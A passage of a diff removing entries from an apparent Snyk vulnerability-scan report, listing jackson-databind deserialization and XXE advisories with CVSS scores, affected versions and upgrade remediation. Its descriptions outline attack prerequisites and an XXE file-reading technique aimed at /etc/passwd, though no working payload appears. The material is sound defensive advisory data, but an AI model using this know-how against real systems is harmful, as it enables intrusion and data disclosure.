- }, - { - "url": "https://github.com/FasterXML/jackson-databind/pull/2864%23issuecomment-701026600", - "title": "GitHub PR" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:52:55.201119Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:02:44.942188Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:52:55.201119Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It mishandles the interaction between serialization gadgets and typing, related to the class `ignite-jta`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.4 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2658)\n- [GitHub PR](https://github.com/FasterXML/jackson-databind/pull/2864#issuecomment-701026600)\n", - "epssDetails": { - "percentile": "0.75677", - "probability": "0.00464", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-10650" - ], - "CWE": [ - "CWE-502" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2020-11-29T12:43:11.601162Z", - "functions_new": [ - { - "version": [ - "[,2.6.7.4)", - "[2.7.0,2.9.10.4)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2020-09-29T22:30:33Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2020-11-29T15:58:07.317638Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:52:55.201119Z", - "socialTrendAlert": false, - "packagePopularityRank": 99, - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5", - "severityWithCritical": "high" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1048302", - "title": "XML External Entity (XXE) Injection", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:L", - "credit": [ - "Bartosz Baranowski" - ], - "semver": { - "vulnerable": [ - "[2.6.0,2.6.7.4)", - "[2.9.0,2.9.10.7)", - "[2.10.0, 2.10.5.1)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "2.6.7.4", - "2.9.10.7", - "2.10.5.1" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.2, - "functions": [ - { - "version": [ - "[2.6.0,2.6.7.4)", - "[2.9.0,2.9.10.7)", - "[2.10.0, 2.10.5.1)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ext/DOMSerializer.java", - "className": "DOMSerializer", - "functionName": "" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/612f971b78c60202e9cd75a299050c8f2d724a59", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2589", - "title": "GitHub Issue" - }, - { - "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1887664", - "title": "RedHat Bugzilla Bug" - } - ], - "cvssDetails": [ - { - "assigner": "SUSE", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:N", - "cvssV3BaseScore": 5.8, - "modificationTime": "2024-03-11T09:49:41.313444Z" - }, - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:50:46.628614Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:51:14.249736Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:L", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.2, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:03:31.367594Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:N", - "assigner": "SUSE", - "severity": "medium", - "baseScore": 5.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:49:41.313444Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", - "assigner": "NVD", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:50:46.628614Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:14.249736Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to XML External Entity (XXE) Injection. A flaw was found in FasterXML Jackson Databind, where it does not have entity expansion secured properly in the `DOMDeserializer` class. The highest threat from this vulnerability is data integrity.\n\n## Details\nXXE Injection is a type of attack against an application that parses XML input.\nXML is a markup language that defines a set of rules for encoding documents in a format that is both human-readable and machine-readable. By default, many XML processors allow specification of an external entity, a URI that is dereferenced and evaluated during XML processing. When an XML document is being parsed, the parser can make a request and include the content at the specified URI inside of the XML document.\n\nAttacks can include disclosing local files, which may contain sensitive data such as passwords or private user data, using file: schemes or relative paths in the system identifier.\n\nFor example, below is a sample XML document, containing an XML element- username.\n\n```\n\n\n John\n\n```\n\nAn external XML entity - `xxe`, is defined using a system identifier and present within a DOCTYPE header. These entities can access local or remote content. For example the below code contains an external XML entity that would fetch the content of `/etc/passwd` and display it to the user rendered by `username`.\n\n```\n\n\n]>\n &xxe;\n\n```\n\nOther XXE Injection attacks can access local resources that may not stop returning data, possibly impacting application availability and leading to Denial of Service.\n\n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.7, 2.10.5.1 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/612f971b78c60202e9cd75a299050c8f2d724a59)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2589)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=1887664)\n", - "epssDetails": { - "percentile": "0.68432", - "probability": "0.00275", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-25649" - ], - "CWE": [ - "CWE-611" - ], - "GHSA": [ - "GHSA-288c-cq4h-88gq" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2020-12-04T11:58:40.054903Z", - "functions_new": [ - { - "version": [ - "[2.6.0,2.6.7.4)", - "[2.9.0,2.9.10.7)", - "[2.10.0, 2.10.5.1)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ext.DOMSerializer", - "functionName": "" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2020-12-04T11:54:03Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2020-12-04T15:22:52Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:51:14.249736Z", - "socialTrendAlert": false, - "packagePopularityRank": 99, - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5", - "severityWithCritical": "high" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1052449", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,2.9.10.8)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "2.9.10.8" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.10.0.pr1)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2986", - "title": "GitHub Issue" - } - ], - "cvssDetails": [ - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:48:38.926544Z" - }, - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:51:26.923105Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:55:42.491903Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:48:38.926544Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:26.923105Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It mishandles the interaction between serialization gadgets and typing, related to `org.apache.commons.dbcp2.datasources.PerUserPoolDataSource`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\n\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.\n\nJava deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library (Apache Commons Collection)](https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.\n\n \nAn attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.\n \n\n> Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application, an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).\n\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2986)\n", - "epssDetails": { - "percentile": "0.66225", - "probability": "0.00262", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-35490" - ], - "CWE": [ - "CWE-502" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2020-12-18T11:37:26.422837Z", - "functions_new": [ - { - "version": [ - "[,2.10.0.pr1)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2020-12-18T11:32:48Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2020-12-18T16:33:11Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:51:26.923105Z", - "socialTrendAlert": false, - "packagePopularityRank": 99, - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5", - "severityWithCritical": "high" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1052450", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,2.9.10.8)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "2.9.10.8" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.10.0.pr1)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2986", - "title": "GitHub Issue" - } - ], - "cvssDetails": [ - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:48:38.975620Z" - }, - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:50:57.453912Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:55:38.762302Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:48:38.975620Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:50:57.453912Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It mishandles the interaction between serialization gadgets and typing, related to `org.apache.commons.dbcp2.datasources.SharedPoolDataSource`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\n\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.\n\nJava deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library (Apache Commons Collection)](https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.\n\n \nAn attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.\n \n\n> Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application, an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).\n\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2986)\n", - "epssDetails": { - "percentile": "0.66225", - "probability": "0.00262", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-35491" - ], - "CWE": [ - "CWE-502" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2020-12-18T11:40:53.658144Z", - "functions_new": [ - { - "version": [ - "[,2.10.0.pr1)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2020-12-18T11:40:13Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2020-12-18T16:33:11Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:50:57.453912Z", - "socialTrendAlert": false, - "packagePopularityRank": 99, - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5", - "severityWithCritical": "high" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1054588", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P", - "credit": [ - "bu5yer" - ], - "semver": { - "vulnerable": [ - "[2.0.0, 2.9.10.8)" - ] - }, - "exploit": "Proof of Concept", - "fixedIn": [ - "2.9.10.8" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[2.0.0, 2.9.10.8)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2999", - "title": "GitHub Issue" - }, - { - "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", - "title": "Medium Post" - }, - { - "url": "https://github.com/Al1ex/CVE-2020-35728", - "title": "PoC" - } - ], - "cvssDetails": [ - { - "assigner": "SUSE", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", - "cvssV3BaseScore": 7.3, - "modificationTime": "2024-03-11T09:49:38.478896Z" - }, - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:51:01.576739Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:51:23.852735Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:58:43.478254Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", - "assigner": "SUSE", - "severity": "high", - "baseScore": 7.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:49:38.478896Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:01.576739Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:23.852735Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It mishandles the interaction between serialization gadgets and typing, related to `com.oracle.wls.shaded.org.apache.xalan.lib.sql.JNDIConnectionPool` (aka embedded Xalan in `org.glassfish.web/javax.servlet.jsp.jstl`).\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2999)\n- [Medium Post](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n- [PoC](https://github.com/Al1ex/CVE-2020-35728)\n", - "epssDetails": { - "percentile": "0.80006", - "probability": "0.00674", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-35728" - ], - "CWE": [ - "CWE-502" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2020-12-27T14:34:18.527699Z", - "functions_new": [ - { - "version": [ - "[2.0.0, 2.9.10.8)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2020-12-27T14:05:38Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - 